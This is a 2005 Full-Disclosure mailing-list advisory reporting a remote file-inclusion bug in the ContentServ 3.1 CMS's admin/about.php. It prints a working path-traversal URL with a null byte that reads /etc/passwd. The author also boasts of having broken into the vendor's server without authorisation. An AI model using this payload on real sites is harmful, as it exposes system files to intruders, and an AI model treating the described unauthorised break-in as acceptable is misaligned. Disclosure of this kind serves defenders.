[Full-disclosure] ContentServ features remote file disclosure

[qobaiashi@xxxxxxx]

----------------------------------------------------------------------
--[ ContentServ (still) features remote reading of arbitrary files ]--
-------------------------[ qobaiashi@xxxxxxx ]------------------------

/*  Boring PHP bug warning:
 *  """"""""""""""""""""""""""""""
 *  By reading boring PHP bug advisories it is possible to 
 *  fall asleep (if not affected) instantly w/o a warning!
 *  
 *  I told you, it's your decision now.
 */

ContentServ is a cms developed by ... ContentServ.de and is a quite
commonly used cms system at least in .de.

Some months ago while pentesting www.contentserv.com i've found a bug
(yo alex i rooted you back then but somehow you didn't need sec support)
in ContentServ 3.1. which - to my surprise - is still accessible on some
installations. Somebody should have read the apache logs over there ;)
I had some fun with it (the bug and your server) back then.

The bug resides in /admin/about.php:
[...]
        include("../$ctsWebsite/data/config.php");
[...]


This boils down to a damn stupid:

www.we-cant-design-our-hp.com/contentserv/3.1/admin/about.php?
ctsWebsite=../../../../../../../../../../etc/passwd%00

to give you some informations.

-----------------------------
Disclosure timeline:

Bug found:      2004
Bug disclosed:  Son Sep 25 16:04:40 CEST 2005
Bug fixed:      ask your vendor

have fun.
-q
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/